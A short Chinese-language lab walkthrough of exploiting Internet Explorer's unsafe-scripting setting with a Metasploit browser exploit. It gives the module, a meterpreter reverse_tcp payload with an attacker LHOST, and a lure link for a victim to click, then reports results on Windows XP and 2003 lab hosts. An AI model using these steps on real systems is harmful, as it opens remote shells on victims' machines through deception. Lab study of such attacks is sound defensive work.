利用的漏洞代码为:exploit/windows/browser/ie_unsafe_scripting
命令如下:
set exploit/windows/browser/ie_unsafe_scripting
set payload windows/meterpreter/reverse_tcp
设置攻击者IP:
set LHOST 192.168.1.161
exploit
通过某种手段让对方点击你的链接:https://192.168.1.161:8080/ROyFJ7CRyWxuN
这里只是做为测试,所以就直接复制链接在目标主机的浏览器中打开。
然而,结果并不如愿,没能成功建立会话:
失败的原因在哪里呢?
原来,此漏洞必须满足一个条件,那就是图下的一个选项必须打开:
此时再在目标浏览器中(WIN XP系统)打开该链接时,出现如下:
终于成功建立了会话。
然而在WIN 2003系统中,仍然未能成功。